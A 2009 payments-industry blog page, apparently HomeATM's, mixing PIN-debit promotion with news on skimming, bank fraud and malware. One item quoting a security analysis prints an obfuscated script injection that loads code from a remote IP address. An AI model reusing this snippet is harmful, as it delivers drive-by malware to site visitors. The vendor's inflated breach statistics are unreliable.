Mobile Payment Industry News

Thursday, April 9, 2009

American Banker Article on HomeATM

American Banker
Remittance Use Seen for Online PIN Debit Device

Thursday, April 9, 2009
By Will Hernandez

HomeATM ePayment Solutions, which offers a system that lets people make online purchases with PIN debit cards, is now promoting its technology for remittances and online banking.

(Editor's Note: That's not to say that we're NOT promoting it for use with eCommerce transactions. We most certainly are. In fact, our device provides the ONLY "TRUE PIN Debit" application...as it enables a "card present" transaction. By definition, a software-based application is and always will be, a "card not present" transaction... therefore it would not qualify for "card present" Interchange rates...let alone card present PIN Debit Interchange.)

The Montreal company said last month that its SafeTPIN device meets the Payment Card Industry data security standard, and Ken Mages, HomeATM's chairman and chief executive, said last week that his company had signed a deal with a foreign remittance company that plans to distribute 250,000 of the devices to U.S. consumers, who could use them to send money to their home countries. He would not name the remittance company or say where it is based.

"Once those units are out there, they do us a lot of good because they can be used for any merchant who wants to use our payment method," Mages said.

The SafeTPIN devices incorporate both a card reader and PIN pad; it plug(s) into a computer's USB port. Participating Web sites prompt users to swipe their debit cards and enter their PIN to complete the transaction.

John B. Frank, HomeATM's executive adviser, said the PCI certification could make online merchants more willing to accept the device since HomeATM would be liable for any breach linked to a SafeTPIN.

Editor's Note: That's fine, what's printed above, however, my actual quote was this: "One of the major benefits to merchant's who would choose to utilize HomeATM's PCI 2.0 PED certified device is that it would effectively remove them from the scope of PCI DSS compliance, and that fact alone could save them hundreds of thousands, if not millions of dollars." But I'll go with American Banker's quote...Here's why:

HomeATM's solution Triple DES encrypts the "entire" transaction in our PCI 2.0 PED certified device (including the Track 2 data) AND utilizes DUKPT key management. So we not only have TRUE PIN Debit, but we have TRUE end-to-end encryption (E2EE) Even in the unlikely event a hacker was to intercept a transaction, (and unencrypt it, and get lucky and guess the PIN) they would have ONE card. That's it. DUKPT key management assigns an individual key to each transaction. Since hackers, like water, find the path of least resistance, I don't think they'd exhaust the time and effort necessary to enable them to try and "guess" the PIN ...in order to obtain the information for just ONE card. I think it's much more likely that they'd go after a software application as software is 92 million times easier to breach...which is why 92% of all breaches are software related. Continuing on with the American Banker article:

The device is also easy to use in sending remittances, Frank said.

A dedicated Web site prompts the sender to enter his name and e-mail address, the recipient's name and e-mail address and the amount. The sender also selects a security question, the answer to which is known by both parties.The sender then swipes his or her card and enters the PIN to complete the transaction. (Senders can also use credit cards by using the same PIN that they already use for automated teller machine withdrawals.) Both the sender and recipient receive a confirmation by e-mail. To claim the money, the recipient visits the Web site, answers the security question and swipes his or her debit card through a SafeTPIN device and enters a PIN. The funds are instantly transferred to the recipient's checking account.

"It's user-friendly," Frank said. "Consumers (have been swiping their cards at retail locations for years) already know how to go to a retailer, swipe their card and enter a PIN."

Mages said his company has not yet set a price for the SafeTPIN devices; he expects merchants and banks to take the lead in distributing them to consumers.

HomeATM will also offer the device to banks as a tool to authenticate online banking customers.

SafeTPIN is more secure than the user name-password combination widely used today, Mages said. "If someone puts malware on your computer and they are keylogging the strokes or they phished you to a third party, they are going to be able to read your bank account."

Paul Turgeon, a senior consultant at the research firm Payments and Processing Consultants, in Chicago, said that consumers' online banking passwords can be hacked but that a hardware device offers strong security.

Turgeon formerly worked at Metavante Technologies Inc.'s NYCE Payments Network LLC debit unit, where he helped develop a similar card reader for consumers, SafeDebit.

He said HomeATM's device is a "reasonably affordable and very good" product but that the technology is not an issue. Merchants and banks that would consider offering the devices to consumers need to believe it is worth the investment.

Merchants will wonder "how many consumers is it going to get for me," he said, and banks will ask "what is the interchange rate." (The answer is TRUE card present, PIN Debit published rates) Any kind of Internet PIN-debit product will face challenges until something can "get enough mass to get both parties interested." Editor's Note: Challenges are fun.

Turgeon also said the Federal Financial Institutions Examination Council has required two-factor authorization for online banking for some time "and no one I know is doing it very well."

Internet Hacker Hits Bank Accounts

Internet hacker hits bank account - Local News - Rotorua Daily Post

by By CHERIE TAYLOR, cherie.taylor@dailypost.co.nz

Eleven Rotorua people are accused of hacking into online bank accounts and stealing thousands of dollars in an elaborate internet scam. One of the accused has admitted her role in the widespread fraud ring that targeted the National Bank. Nine others have been remanded without plea after appearing in Rotorua District Court yesterday, and one is wanted by police after failing to show up.

The Daily Post can today reveal details of the scam which involved people using the bank's secure website to access accounts and transfer money from one account to another, creating credits in their own or a nominated bank account. Editor's Note: Wait until the professionals get crackin'!

The woman who pleaded guilty yesterday was Rotorua's Lauren Sainty, an unemployed 25-year-old. she stole nearly $6000 and the nine others are accused of stealing about $56,000 and allegedly attempting to steal a further $25,000.

Sainty pleaded guilty to one charge of accessing the National Bank website on December 18 last year, gaining $2998 and three counts of gaining pecuniary advantage by obtaining cash amounts of $198, $2000 and $800 on the same day.

The police's summary of facts states that from June 2008, a small group of people in Hamilton found a way to access the National Bank internet website and transfer money from one account to another, creating credits in their own or a nominated bank account. The money was then withdrawn the next day before the money was dishonoured for insufficient funds. This then put both accounts into overdraft. The scheme became widely known to criminals in the following months before the scam was picked up, the summary states.

In November, the scale of transactions and reversals became large enough to become noticed in the banking world. By late November, the matter was reported to police.

Judge Chris McGuire noted Sainty was a first-time offender and sentenced her to 150 hours' community work and ordered her to repay $2998 to the bank. When contacted by The Daily Post, ANZ National Bank spokeswoman Jessamy Malcolm-Cowper said she was unable to make specific comments as the matter was still before the courts. Meanwhile, nine other people appeared before the registrar yesterday and did not enter pleas to the charges they each faced. All were remanded on bail to appear back in court on April 27. An arrest warrant has been issued for Rory Carlaw, 20, after he failed to show up yesterday.

THE ACCUSED

Chantelle Rangitaitaia Green, bartender, 21, two counts of accessing a National Bank internet website in an attempt to steal $11,000.
Tracy Gail Dawn Anson, 19, unemployed, one charge of accessing the National Bank internet banking system dishonestly gaining $6000.
Elaine Rewa Jeffery, 44, unemployed, one charge of accessing the National Bank internet website in an attempt to gain $3000.
Jordan Moke, 18, one charge each of accessing the National Bank internet website to dishonesty obtain $1000, dishonestly using an ANZ debit card to obtain cash and cultivation of cannabis.
Tyrone Benjamin Moke, 21, unemployed, two charges of accessing the National Bank internet website to gain $4048 and $1000 plus three counts of using his own bank card withdrawing $800, $2000 and $202.
Deidre Anne Heta, 31, solo parent, 11 charges of illegally using her bank card to withdraw a total of $5191.
Brian Charles Brogden, 30, unemployed, one charge of accessing the National Bank internet website in an attempt to gain $2000.
Wallace Waiariki, 42, table hand, one count of accessing the National bank internet website in an attempt to gain $4000.
Owen Dlyakiya, 20, from South Africa, one charge of accessing the National bank internet website dishonestly gaining $4672 and four charges of using his bank card to dishonestly gain a total of $4673.
Moanata Janey Karaitiana, 23, unemployed, five charges of accessing the National Bank internet website to gain $20,700 and 35 charges of using debit cards to gain $11,739.
Rory Carlaw, 19, plasterer, one charge of accessing the National Bank internet website in an attempt to gain $5000 and one charge of possession of cannabis - warrant issued to arrest.

Onliine Sales in Germany Rising

	April 9, 2009
German Online Sales Rose Last Year Despite endemic economic losses in Europe in 2008, online sales in Germany experienced healthy growth. Full Article

PIN Debit Payments Blog: Book 'em Danno! Cybercrime Thrives in Hawaii

Book 'em Danno! Cybercrime Thrives in Hawaii

Cybercrime thrives in Hawaii, 8th in nation in e-criminals per capita
Hawaii ranks 8th nationally in online criminals per capita

By Peter Boylan - Advertiser Staff Writer

White-collar crooks using the digital domain to commit crime are prevalent in Hawai'i, as the state ranks in the top 10 for highest number of perpetrators per 100,000 residents, according to FBI statistics.

There were 44.Five-O alleged electronic fraud criminals per 100,000 residents in Hawai'i last year, putting the state eighth on the FBI's watch list. Hawai'i trails New York, Delaware, Florida, Montana, Washington, Nevada and Washington, D.C.

"We are very concerned with the victimization in Hawai'i in particular because the culture of our Islands is one of trust. Thus, many times our victims just could not believe it would happen to them," U.S. attorney Ed Kubo said.

"Those who are perpetuating Internet crimes feel that they can hide behind the cloak of secrecy when they scam our innocent victims out of their hard-earned money. These criminals do not care what circumstances their victims are in as long as they can successfully get their ill-gotten gains.

"What bothers me about this trend of Internet crime is that in this technological age, these types of crimes are increasing at a faster rate than other crimes."

Hawai'i averages about 800 Internet criminal complaints every year.

In 2007, Hawai'i residents reported Internet fraud losses of more than $1 million, with auction fraud and failure to deliver paid-for merchandise the most prevalent forms of online crime.

Users of eBay and other online auction houses are required to pay for their merchandise before receipt. Often, Internet fraud purveyors will post pictures of merchandise that does not exist. The winner of the auction will send a payment using a credit card or third-party transaction handler such as PayPal.

The criminal will keep the money and after about a week, when the merchandise doesn't arrive, the purchaser will file a complaint with the auction house. By the time the complaint is forwarded to law enforcement officials, the criminal is often long gone, law enforcement officials said.

The FBI has warned that given the global economic woes, identity thieves and Internet fraud schemes are on the rise. Hawai'i had the 17th-highest rate of complaints per 100,000 residents in 2008 with 84.92.

"Internet crime is something we are closely monitoring in Hawai'i. Given what our data shows us, regarding the frequency of these complaints happening in the state, we urge the public to be vigilant with their personal information whenever they are working, shopping or playing online," said FBI special agent Brandon Simpson.

Continue Reading at Honolulu Advertiser

Wednesday, April 8, 2009

Acculynk Claims Consumers Like Their Solution

Editor's Note: This came across the news wires today and in fairness, I thought I'd share it with the PIN Payments News Blog readers. After speaking with HomeATM CEO and Chairman, Ken Mages, he asked me to remind readers what he said a couple weeks back: PIN on PED vs. PIN on the Web

"I'll make this last promise or take a lunch bet with anyone...that once software PIN goes live, within a month, an FTP site will arise with it's user's PAN and PIN numbers. I One-Hundred-Percent (100%) guarantee it." - kgm - Chairman/CEO - HomeATM ePayment Solutions

To read a White Paper comparison on "Hardware vs. Software" Security Click the Picture Above Left (PIN Debit Payment PDF) and it will open. Here's Acculynk's Press Release:

Study Finds New Payment Software PaySecure Increases Debit Cardholder Confidence Online

Secure PIN Debit Payment Method Could Increase Online Debit Card Transactions and Lead to Additional Internet Purchases

SAN FRANCISCO--(BUSINESS WIRE)--A new Javelin Strategy & Research (www.javelinstrategy.com) study reveals that a majority of surveyed debit cardholders feel confident about using their personal identification number (PIN) to make online purchases with PaySecure, a new Internet PIN debit payment method provided by Acculynk.

The study, commissioned by Acculynk and PULSE, evaluated debit cardholder perceptions and attitudes about PaySecure, and included 500 U.S. debit card users who purchased online in the last year. Participants used PaySecure for a mock online purchase and then answered a series of questions about their experience using the product.

According to the study, 80% of survey participants would use PaySecure when it is presented by a trusted merchant, 65% of survey participants would feel safer buying on the Internet with PaySecure, and 48% would buy more often on the Internet if they could pay with PaySecure.

“Our research shows that consumers are more willing to complete an online purchase when they feel the transaction is secure,” said James Van Dyke, Founder and President of Javelin.

“In the current economic climate, debit payment methods that increase consumers’ perceived security will be preferred by more consumers.”

Key Findings From the Custom Survey:

93% of survey participants found PaySecure easy to use, with 88% stating they understood that the PaySecure PIN-pad scrambles the number pad to increase the security of their transaction.
89% of participants like the fact they would pay directly on the merchant’s website without being redirected, and 86% like that PaySecure does not require additional passwords, log-ins or one-time use numbers.
78% agreed that entering their PIN on the PaySecure PIN-pad was similar to and as simple as entering their PIN at the ATM or grocery store.
79% of participants would feel more secure using their debit card online with a PIN than using their debit card without a PIN.
64% of participants would use PaySecure for all of their online debit card transactions if asked by their merchant to do so.
63% of participants would prefer to pay with PaySecure than pay using PayPal.

Methodology

The study was commissioned by PaySecure provider Acculynk and PULSE and conducted by Javelin Strategy & Research. The study, conducted in March, 2009, recruited 500 U.S. adults to participate. Participants were targeted to obtain U.S. nationally representative groups based on age, gender and annual household income. To qualify for the study, participants were required to use their debit card for at least 40% of point of sale purchases and Internet purchases, and made a purchase on the Internet in the last twelve months. Participants used the PaySecure PIN-pad for a mock online purchase and then completed a survey of agree/disagree questions to question the product’s ease of use, consumer acceptance and perceived security. Agreement for an item was determined as 7 or greater on a 10 point scale.

About Javelin Strategy & Research

Javelin is the leading independent provider of quantitative and qualitative research focused exclusively on financial services topics. Based on the most rigorous statistical methodologies, Javelin conducts in-depth primary research studies to pinpoint dynamic risks and opportunities. Javelin helps its clients achieve their initiatives through three service offerings, including syndicated research subscriptions, custom research projects and strategic consulting. Javelin’s client list includes some of the largest banks, credit unions, card issuers, and technology enterprises in the financial services industry. For more information about this or other Javelin reports, please visit www.javelinstrategy.com/research or call (925) 225-9100.

About Acculynk

Acculynk is a leading technology provider with a suite of software-only services that secure online transactions. Backed by a powerful encryption and authentication framework protected by a family of issued and pending patents, Acculynk’s services provide greater security, reliability, convenience and return on investment for consumers, merchants, networks, issuers and acquirers. For more information, visit www.acculynk.com.

About PULSE

PULSE is one of the nation’s leading ATM/debit networks, currently serving more than 4,500 banks, credit unions and savings institutions across the country. PULSE is owned by Discover Financial Services (NYSE: DFS). The network links cardholders with more than 289,000 ATMs, as well as POS terminals at retail locations nationwide. The company is also a valued resource for industry research related to electronic payments and is committed to providing its participants with education on evolving products, services and trends in the payments industry. For more information, visit www.pulsenetwork.com.
Contacts

Javelin Strategy & Research
Kathleen McCabe, +1-925-225-9100 ext. 15
Marketing Director
k.mccabe@javelinstrategy.com

Permalink: http://www.businesswire.com/news/google/20090408005322/en

Acculynk, HomeATM, PIN Debit, Internet PIN Debit, Pulse, Javelin Research

82% Concerned About Private Label Prepaid Cards

Private Prepaid Cards Take Lumps From Recession: Survey - 04..2009 - U.S. Banker Article

U.S. Banker | April 2009
By Joseph Rosta

Private-label prepaid cards are losing their luster because of the recession, according to an Aite Group research note based on a survey of 21 card industry executives.

Eighty-two percent of those participating say current economic conditions are have a “somewhat to very adverse” impact on the sale of private-label cards, as expanding retailer bankruptcies stoke consumer fears they could be stuck holding worthless and unredeemable gift and other prepaid cards from defunct chain stores.

Continue Reading

ATM Skimming Victims Lose $50K (Video)

wgrz.com | Buffalo, NY | ATM Skimming Victims Lose More Than $50,000

The United States Attorneys Office announced Tuesday it's prosecuting a Romanian man for stealing more than $50,000 through a scam known as ATM skimming.

Assistant U.S. Attorney Aaron Mango said Tiberiu Szebeni, 29, used an electronic faceplate, known as a skimmer, to steal account information from ATM customers. Typically, the device sits on top of the slot in which bank cards are inserted.

"When you put your card into the ATM, it passes through this skimming device, and the skimming device then records all of the information on your card," Mango explained.

Once the thieves have that information, all they need is your pin number. Mango said that's typically obtained through the use of a tiny, pinhole camera with a view of the keypad, but he said thieves may also utilize a high-powered, zoom camera stationed somewhere in the distance.

Mango said once Szebeni obtained both the account and pin numbers, he transferred that information to empty store gift cards. Then, by using the magnetic strip in each card, Mango said Szebeni essentially turned each one into a clone of the original ATM card.

Federal prosecutors have charged Szebeni with use of a fraudulent access device with intent to defraud. Secret Service agents arrested him at the Rainbow Bridge on March 31st after a tip from a Rochester resident led them to the Romanian citizen.

Continue Reading

ATM Skimming, Card Skimming, Skimming Device

Paul McCartney Website LuckySploited

Source: scmagazineus:Complete item: http://www.scmagazineus.com/Paul-McCartneys-website-hacked-to-distribute-malware/article/130330/

Description:
The official website for former Beatle Paul McCartney was compromised to infect users through drive-by downloads.

The site was attacked by the LuckySploit toolkit, according to web security firm ScanSafe, which discovered the hack. The toolkit was recently updated to include a set of HTML files that contain obfuscated and malicious JavaScript code, according to NoVirusThanks.org, a computer security website.

ScanSafe said in a statement that its researchers discovered the infection on Saturday, the same day McCartney reunited on stage with Ringo Starr for the first time in years. The toolkit was hidden behind an invisible frame on the site. When users visited, their machines were hit with an exploit that downloaded a rootkit.

Once the rootkit is installed "behind the scenes" on the victim's computer, thieves could steal personal information, such as credit card details and login credentials, according to ScanSafe.

"Once your computer is infected with a rootkit, none of your personal information is safe," said Spencer Parker, director of product management for ScanSafe, in a statement. "This is an extremely attractive target for cybercriminals given the level of attention McCartney is receiving at this moment.

McCartney's site quickly was fixed, according to ScanSafe. It is unclear how many users were compromised. A representative for the musician could not be reached for comment on Tuesday.

Related:

The website of famed singer Paul McCartney is the latest victim in a string of website compromises involving the Luckysploit exploit toolkit. The compromises are related to an outbreak of bank-related data theft trojans during the first quarter of 2009. These outbreaks track back to the Zeus botnet which was implicated in a $6 million dollar commercial account heist on 20 European banks in the summer of 2008.

As far as exploit toolkits go, Luckysploit is a bit unusual insasmuch as it uses an asymmetric key algorithm (standard RSA public/private key cryptography) to encrypt the communication session with the browser.

Zeus bots are known for browser traffic sniffing, intercepting POST data and keystrokes associated with the active browser session as well as clipboard data pasted into the browser. While these actions faciliate Zeus' activities concerning banking theft, it could also lead to compromise of FTP credentials. For this reason, impacted sites may not just be spreading new Zeus banking trojans and bots, their management systems may also be infected with previous variants of Zeus bots and banking trojans.

Embedded scripts on impacted pages may appear as follows:

var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i

Compromises have also been observed on flat HTML-only sites, furthering the likelihood that compromised FTP credentials may be the cause. As with most malware today, symptoms of a Zeus infection include the disabling of firewall or other security software. Zeus bots and trojans are also rootkit-enabled, which may hamper discovery efforts.

Source: E-Secure-IT
https://www.e-secure-it.com

HomeATM Press Release

With PCI PED 2.0 Certification in Hand, HomeATM Targets Funds Transfers

HomeATM Announces Strategic Partnership to Deploy 250,000 Terminals with Major Remittance Provider

FOR IMMEDIATE RELEASE

PRLog (Press Release) – Apr 08, 2009 – Chicago: HomeATM ePayment Solutions, a leading provider of secure hardware and software solutions, today announced that it has signed a contract with a major remittance provider to provide 250,000 Safe-T-PIN (TM) terminals to it's customers.

The Safe-T-PIN point of sale terminal, manufactured by HomeATM, is the first ever Internet PED to achieve PCI PED 2.0 certification from the Payment Card Industry. Safe-T-PIN provides secure two factor authentication for e-commerce transactions and secure log-in.

When combined with HomeATM's proprietary electronic money transfer platform, the SafeTPIN allows consumers and businesses alike, to swipe any bank card, enter their PIN and transfer money in real-time to the recipient.

With the HomeATM Funds Transfer application, it's no longer necessary to go through the hassles of driving or walking to a money transfer location to send or receive money. It can be done in the safety of your own home in real time. HomeATM also eliminates the burden of having to preload third party cards...simply swipe your existing bank card, enter your PIN and send. The recipient swipes their bank card, enters their PIN and receives. Nothing could be more simple.

The pocket-sized Safe-T-PIN(TM) is USB "plug and play," eliminating the need for drivers or downloads. Additionally, it works with any operating system or browser. The device provides users with the added convenience of swiping their cards versus keying in their numbers and will work with any bank, card processor, and currency. The significance of this feat is that bank/military grade encryption (including 3DES and DUKPT key management) of financial data from beginning to end, is now affordable to the masses.

SourceMedia's ATM&Debit News has featured HomeATM on a front page article in their latest issue which you can access at www.HomeATMBlog.com

About HomeATM's Safe-T-PIN (tm)

The HomeATM Safe-T-PIN is the world's only PCI PED 2.0 Certified E-Commerce Device. Employing Tripe DES Encryption and DUKPT Key Management, it provides complete end-to-end encryption protecting the users card data from beginning to end.

About HomeATM

HomeATM owns a global patent for secure Internet PIN based transactions. Leveraging our E2EE PCI 2.0 PED certified solution, a merchant or remitter can move funds from their bank account or open loop/closed loop payment card in real-time. Utilizing HomeATM's patented solution with a bank issued card alleviates the burden for merchants to address fraud issues as HomeATM leverages the issuing bank's KYC/AML (Know Your Customer/Anti-Money Laundering) protocols. No other payment solution serves Person-to-Person, Business-to-Consumer, Business-to-Business, and Mobile Payments with the speed, security and cost-effectiveness of HomeATM. HomeATM is EMV ready and already enjoys strategic relationships with Cardinal Commerce and UATP.

For further information, visit: www.HomeATMBlog.com or contact Mitchell Cobrin, COO mcobrin@HomeATM.net

# # #

HomeATM, Safe-T-PIN, 3DES, DUKPT, Secure, PIN Debit, Money Transfer, Press Release

Wolf in Sheep's Clothing - Security Software

Rogue security software now a top threat - Computer Business Review : News

Rogue security software now a top threat
Published:08-April-2009 | By Kevin White

Microsoft charts rise of malware in fake security software

(Editor's Note: I've provided examples of Rogue Software Sites below)

Security intelligence gathered by Microsoft Corp shows a significant increase in rogue security software or ‘scareware’ that lures people into paying for protection that, unknown to them, is actually malware often designed to steal personal information.

According to the latest Microsoft Security Intelligence Report released today, rogue programmes known as Win32/FakeXPA and Win32/FakeSecSen were detected on more than 1.5 million computers.

Win32/Renos, another threat that is used to deliver rogue security software, was detected on 4.4 million unique computers, an increase of 67% percent over the first half of 2008.

Vinny Gullotto, general manager of the Microsoft Malware Protection Centre said, "We see cybercriminals increasingly going after vulnerabilities in human nature rather than software.”

He said the security industry needs combat the next generation of online threats through a community-based defence and broad industry cooperation with law enforcement and the public.

Rogue security software and other social engineering attacks compromise people's privacy and are costly; some take personal information and tap into bank accounts, while others infect computers and rob businesses of productivity.

Steps can be made to counter the problem, and the report recommends that security managers always configure computers to use Microsoft Update instead of Windows Update.

They should also use the Microsoft Security Assessment Tool (MSAT) to help assess weaknesses in their IT security environment.

Individuals are warned not to follow advertisements for unknown software that appears to provide protection and should avoid opening attachments or clicking on links to documents in e-mail or instant messages that are received unexpectedly or from an unknown source.

The report also cited the biggest cause of data breaches as lost and stolen computer equipment, which it reckons makes for 50% of all reported incidents.

PIN Payments News is Providing Warnings on the following rogue sites:

TheGreatSecurity.com is a scam website designed to sell rogue anti-spyware programs. Upon entering the website you will be greated by a fake online system scan, which returns an exaggerated report full of non-existent infections. Afterwards the website will display some popups, which read:

"The page at http://TheGreatSecurity.com says: Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC" or "http://TheGreatSecurity.com says: Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! System Security will perform a quick and free scanning of your PC for viruses and malicious programs." TheGreatSecurity.com is a malicious website, and should therefore be blocked using the HOSTS file.

WWWMobileReads.com is a malicious website, created for only one purpose - to sell rogue anti-spyware programs. WWWMobileReads.com provides a fake online system scan, which will attempt to scare the user with fake threats. Afterwards it will display a few popups with the same reason in mind. The popups read:

"The page at http://WWWMobileReads.com says: Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC" or "http://WWWMobileReads com says: Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! System Security will perform a quick and free scanning of your PC for viruses and malicious programs." MobileReads.com is a malicious website and should therefore be blocked using the HOSTS file.

JBF

Attack of the Card Skimmers - Gizmodo

Source: Gizmodo
Complete item: http://i.gizmodo.com/5202776/attack-of-the-card-skimmers-its-happening-right-here-right-now

Description:
Previously on C.S.I... a man found an actual card skimmer in the wild, in the flesh. Today, Gizmodo reader Sean became the card skimmer/PIN camera's latest almost-victim. Where? Chase Bank in Manhattan, East Village.

Sean Seibel was inside a local Chase bank where he inserted his ATM card into one of two side-by-side automatic teller machines. When the machine told him it could not read his card, it took him a bit of jiggling to get his card back. He tried it a couple more times and got the same results. Before trying the other machine, he inspected the slot of the current ATM he was using and realized that it had a false plastic cover attached to the slot. The amazing thing about the cover was that the translucent green plastic matched the card reader slot perfectly, meaning that it was made specifically for Chase ATMs. After snapping a few photos with his iPhone, he alerted the branch manager and explained what happened.

As he was leaving, Seibel remembered reading about card skimmers having small cameras in the proximity in order to read PIN pad activity, so naturally, he went back to the ATM to inspect, which is where he found an extra mirror attached to the vandalized machine that the other ATMs didn't have. Drilled into the mirror was a tiny pinhole with a camera inside, directed at the PIN pad. Seibel alerted the branch manager again and asked Chase why they hadn't inspected the ATM after he had warned them the first time. Chase honestly replied that they hadn't thought of it because they had never encountered that sort of thing before.

Tuesday, April 7, 2009

HomeATM in the News

Click the Graphic on the Left
to Read About HomeATM in the latest edition of ATM&Debit News

HomeATM's PCI 2.0 PED Certification Provides the following benefits:

Card Present Rates in a Card Not Present World!

"TRUE" PIN Debit Interchange Rates!

Dual Authenticaton!

15 Times More Convenient than Typing in 14-16 Card Number Digits, Expiration Dates and CVV Codes!

Effectively Removes Internet Retailers from the Scope of PCI DSS Potentially Saving Them 100's of Thousands of Dollars! (Same with Financial Institutions, only they could save million$)

End to End Encryption |Triple DES | DUKPT Key Management | Security

Exponentially Advanced Log-In, Authentication Platform for Online Banking!

Home(r)ATM Would Eliminate Cloning Altogether!

In this ISR News post, it is reported that Credit Card Cloners Stole 3.5 million.

In a nutshell, that's 3.5 Million reasons for using HomeATM's SafeTPIN device. Without the PIN, a cloned card would be useless. So would DNS hijacking (redirecting you to a cloned website). No username/password, instead Swipe your Card, Enter your PIN. They wouldn't receive the data...unlike the username/password, which they would receive.

In fact, cloning wouldn't be an "issue" (pun intended) at all, if online merchants employed the HomeATM True PIN Debit solution.

Come to think of it neither would the over exorbitant "Card Not Present" rates...oh...and an end-to-end encryption methodology is certainly an added benefit. Don't let me forget convenience. If I can swipe my card 14-16 times faster than entering 14-16 digits from my credit or debit card, then I consider it to be 14-16 times more convenient. You? And yes, we do credit...and yes...it would be at "card present" credit card rates. Any questions?

ISR News: Credit Card Cloners Steal £3.5m
April 7, 2009 by ADMIN

Excerpts From Finextra.com

A gang of five fraudsters who ran a global credit card cloning ring out of a London flat stole £3.5 million in just a few days, a court heard yesterday.

Prosecutor Ben Fitzgerald told Southwark crown court that police found fake cards and counterfeiting technology in the London flat.

The accused allegedly went on a spree between 28 September and 8 October last year as Barclaycard migrated cardholders from the Goldfish credit card business it acquired from Discover Financial Services earlier in the year.

Computer software found in the flat was used to make fake cards before the gang stole £3.5 million, with £645,000 spent on the cards in Britain alone, the court heard.

Khi-San Voong, 46, Qiu Yeu, 46, Qiang Xue, 34, and Dauy Chung, 40, all of Walworth, deny conspiracy to defraud. Cai Caixa, 27, pleaded guilty.

The trial continues...

credit card cloning, card present, card not present, true pin debit

I Have a Present For You! And a Card!

Card Present vs. Card Not Present

Before you accuse me of luring you to this post with the promise of a "present" and a "card" simply fill out the poll on the right and send me your email and shipping address. You'll get your "card present" enabling SAFETPIN device for free. Take a look at the right sidebar or above for more details.

A recent post by Ed Kountz at the Forrester Blog which made me realize that one of the biggest impacts of a utilizing a hardware vs. software device is simply this. Interchange.

HomeATM is the only company in the world which can provide e-tailers with a PCI 2.0 PED and thus "card present" TRUE PIN Debit rates. Why do I say true? Because our transactions are conducted in the same manner as a traditional retail location.

In addition, because our device is "ALREADY" PCI 2.0 PED certified, and employs DUKPT key management, we would effectively remove e-tailers from the scope of PCI DSS as no cardholder data is transmitted during the transaction.

Once the consumer has our low cost device, they become a "card present" buyer. They swipe their card, they enter their PIN and therefore the e-merchant benefits from not only dual-authentication, but also benefit from significantly lower interchange fees.

Example:

$200 order at Amazon. Card Not Present Rate: 2% + .25 cents = $4.25
$200 order at Amazon Card Present/ PIN Authenticated: = .75 cents. Savings = $3.50 (In this example an 88% savings!)

Now, add security, (PCI 2.0 PED) add convenience (isn't swiping the card 14 to 16 times faster than typing in your 14-16 digit card number?) deduct chargebacks, add familiarity (don't you swipe your card in the store) and our SafeTPIN s a compelling value proposition.

On the flip side, a software based PIN Debit application would still be a "card not present" transaction. The CNP PIN rate doesn't exist, but the EFT networks could create one. Of course, it will be exorbitantly higher than a Card Present PIN transaction. Remember when transactions were done with the device pictured on the left? Well unlike that device, HomeATM's SAFETPIN is built for the long run...and provides safer, more secure and thus lower rates.

So at the end of the day, our device (which is also EMV ready) is built with both the consumers, banks and merchants in mind. A software application is built with only the EFT Switches in mind. So it's no wonder the EFT switches are backing it. It's like Microsoft paying people to use Live Search with their Cashback program. The EFT switches are getting paid to push a software application. But what will be the public's uptake? And where's the benefit to the merchants? A tiny savings on Interchange...in exchange for a higher risk of liability in the instance of a breach? It's all interesting. I would think that the merchants would want a bigger savings and less risk, which is what HomeATM's PCI 2.0 PED provides. Wouldn't you? We'll see...

Here's the article showing the pent up frustration with Interchange Fees from the NRF, the NGA and NACCS. (The Big 3) They are all bricks and mortar organizations and are still throwing a fit about Interchange Rates. When will the Internet Retailer 500 band together and start demanding that they at least be afforded the opportunity to enjoy the rates the "Big 3" are unhapppy with.

Transacting Value: The Impact of Credit Industry Challenges on Card Marketing
Ed Kountz - April 6th 2009

Early on in this blog, I predicted that 2009 would see an increase in the number and stridency of calls for reforms to the U.S. credit card market, particularly in terms of types and amounts of acceptable fees. The Federal Reserve’s December 2008 card industry changes certainly made clear that this was happening. But now, the long-simmering brew appears to be spreading.

Two recent events serve to validate the premise:

--The National Retail Federation (NRF), the National Grocers Association (NGA) NACCS Angle Against Interchange. Recently, the NRF, NGA and NACCS -- together, the big three of retail associations -- recently held what their release billed as a “telephonic press conference” announcing the creation of “unfaircreditcardfees.com,” as well as an associated public interest campaign, to encourage consumers to press legislators for reforms to the “unfair and hidden credit card fees called “interchange””. This approach muddles the issue, in my opinion, as it uses language that ties the interchange dispute to consumers’ raw emotions at the account-fee issue, without identifying the (basic but relevant) differences in those topics. Whatever the ultimate impact, the directness of the appeal is impossible to miss.

--Senate Banking Committee Approves Card Reforms. On March 31, the Senate Banking Committee gave one-vote approval to measures designed to rein in certain credit card industry practices. The bill would include most of the Federal Reserve Rule changes passed in December, such as bans to universal default and double cycle billing, but would add fee restrictions and protections for borrowers under 21. Bill sponsor Chris Dodd said he was going to work over the recess to garner “broad support” for the effort.

As recent delinquency trends suggest, economic conditions continue to impact credit card usage and growth at a macro level. But increased scrutiny of long-held credit card industry practices will add additional pressure to an industry already feeling the strains.

Continue Reading at the Forrester Blog for eBusiness & Chennel Strategy Profressionals

PIN Debit, PCI 2.0, PCI DSS, NACS, NRF, Forrester Research, card present, card not present

ID Cards Could Be Fitted with Chip and PIN Technology to Combat Fraud

The Press Association: ID cards 'could use chip and pin'

ID cards could be fitted with chip and pin technology to help combat identity fraud. The head of the Government agency tasked with producing the cards said there were no "technical obstacles" to adding chips to the cards and handing out pin numbers. James Hall, chief executive of the Identity and Passport Service said adding chips might allow the cards to be used in ATM machines in the future.

Officials are also looking at chip and pin as a possible way to help combat online fraud and help protect internet shoppers.

It also emerged the Home Office has issued half as many ID cards for foreign nationals in the first four months than expected.

When the card was launched in late November ministers predicted that between 40,000 and 50,000 non-EU nationals would have cards by the end of last month. But by the end of last week 22,500 cards had been issued. Mr Hall said they had encountered "the odd wrinkle" in the system but overall it had worked "pretty well".

